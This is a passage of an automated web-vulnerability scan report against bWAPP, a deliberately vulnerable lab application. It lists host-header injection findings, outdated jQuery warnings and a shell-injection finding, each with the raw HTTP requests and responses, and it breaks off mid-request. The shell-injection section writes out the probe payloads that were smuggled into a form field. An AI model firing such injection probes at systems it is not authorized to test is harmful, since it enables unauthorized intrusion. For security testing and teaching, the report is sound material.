    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/logs/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:03:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 988
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/logs</title>
    </head>
    <body>
    <h1>Index of /bWAPP/logs</h1>
    <table><tr><th><img src="/icons/blank.gif" a
    ...[SNIP]...

    Request 2

    GET /bWAPP/logs/?cachebust=1520571808.55 HTTP/1.1
    Host: ma3mnu.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:03:33 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 995
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/logs</title>
    </head>
    <body>
    <h1>Index of /bWAPP/logs</h1>
    <table><tr><th><img src="/icons/blank.gif" a
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at ma3mnu.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.4. http://192.168.52.147/bWAPP/passwords/ [PHPSESSID cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/passwords/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:08:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 1385
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/passwords</title>
    </head>
    <body>
    <h1>Index of /bWAPP/passwords</h1>
    <table><tr><th><img src="/icons/bl
    ...[SNIP]...

    Request 2

    GET /bWAPP/passwords/?cachebust=1520572096.46 HTTP/1.1
    Host: 851xkp.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:08:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 1392
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/passwords</title>
    </head>
    <body>
    <h1>Index of /bWAPP/passwords</h1>
    <table><tr><th><img src="/icons/bl
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at 851xkp.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.5. http://192.168.52.147/bWAPP/passwords/accounts.txt [PHPSESSID cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/accounts.txt

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/passwords/accounts.txt HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 404 Not Found
    Date: Fri, 09 Mar 2018 05:09:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 396
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /bWAPP/passwords/accounts.txt was not found on this s
    ...[SNIP]...

    Request 2

    GET /bWAPP/passwords/accounts.txt?cachebust=1520572145.27 HTTP/1.1
    Host: 57adbu.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 2

    HTTP/1.1 404 Not Found
    Date: Fri, 09 Mar 2018 05:09:10 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 403
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /bWAPP/passwords/accounts.txt was not found on this s
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at 57adbu.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.6. http://192.168.52.147/bWAPP/ws_soap.php [PHPSESSID cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/ws_soap.php

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/ws_soap.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:09:48 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 4954
    Connection: close
    Content-Type: text/html


           <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
           <style type="text/css">
            body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
    ...[SNIP]...

    Request 2

    GET /bWAPP/ws_soap.php?cachebust=1520575783.75 HTTP/1.1
    Host: bc5mkf.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:09:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 4961
    Connection: close
    Content-Type: text/html


           <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
           <style type="text/css">
            body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
    ...[SNIP]...
    </font> http://bc5mkf.192.168.52.147/bWAPP/ws_soap.php<br>
    ...[SNIP]...
    10. The file 'jquery-1.4.4.min.js' includes a vulnerable version of the library 'jquery'
    Previous  Next

    There are 3 instances of this issue:

    10.1. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.6.3 (between * and 1.6.3)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    10.2. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.9.0b1 (between * and 1.9.0b1)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    10.3. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    11. Interesting input handling: Shell injection
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

    Issue detail

    The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order, with evidence. Response attributes that only stay consistent in one probe-set are italicised, with the variable attribute starred.

    Successful probes
       
    Backend Parameter Injection     $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d   &zq=x%3c%61%60%27%22%24%7b%7b%5c
    word_count*901*912
    visible_word_count*735*746
    content_length*X*Y
    line_count*134*141
     To scan for backend parameters, right click on the attached request and select 'Identify Backend Parameters'. This option may not be available for non-standard parameters. Scan progress is visible in this extension's output tab, and new scanner issues will be created for any parameters identified.    
    Interpolation fuzz     %{{z${{z   }}%z}}$z
    visible_textX *Y*
    word_count892 *901*
    whole_body_contentX *Y*
    visible_word_count726 *735*
    content_lengthX *Y*
    line_count132 *134*
       
    Interpolation - dollar     ${{z   }}$z
    visible_textX *Y*
    word_count892 *901*
    whole_body_contentX *Y*
    visible_word_count726 *735*
    content_lengthX *Y*
    line_count132 *134*
       
    Shell injection     $((10/00))   $((10/10))
    word_count892 902
    visible_word_count726 736
    input_reflections0 1
    line_count132 137
    visible_textX *Y*
    whole_body_contentX *Y*
    content_lengthX *Y*

    Request 1

    POST /bWAPP/commandi.php?hqlyu7coqf6=1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 89
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.gov$zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c%26zq%253d

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:08:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 2

    POST /bWAPP/commandi.php?u7m683=1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 81
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.gov%26zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:08:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13201

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 3

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 51
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govjpiun9up4z%25{{zz${{z

    Response 3

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:10:59 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 4

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 49
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govtzed32r62}}%25z}}$z

    Response 4

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:10:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 5

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 46
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govztyjd72dbw1z${{z

    Response 5

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:14:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 6

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 45
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govxmlkz7r50u0}}$z

    Response 6

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:14:15 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 7

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 48
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govv7fi91lls2$((1/0))

    Response 7

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:15:34 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 8

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
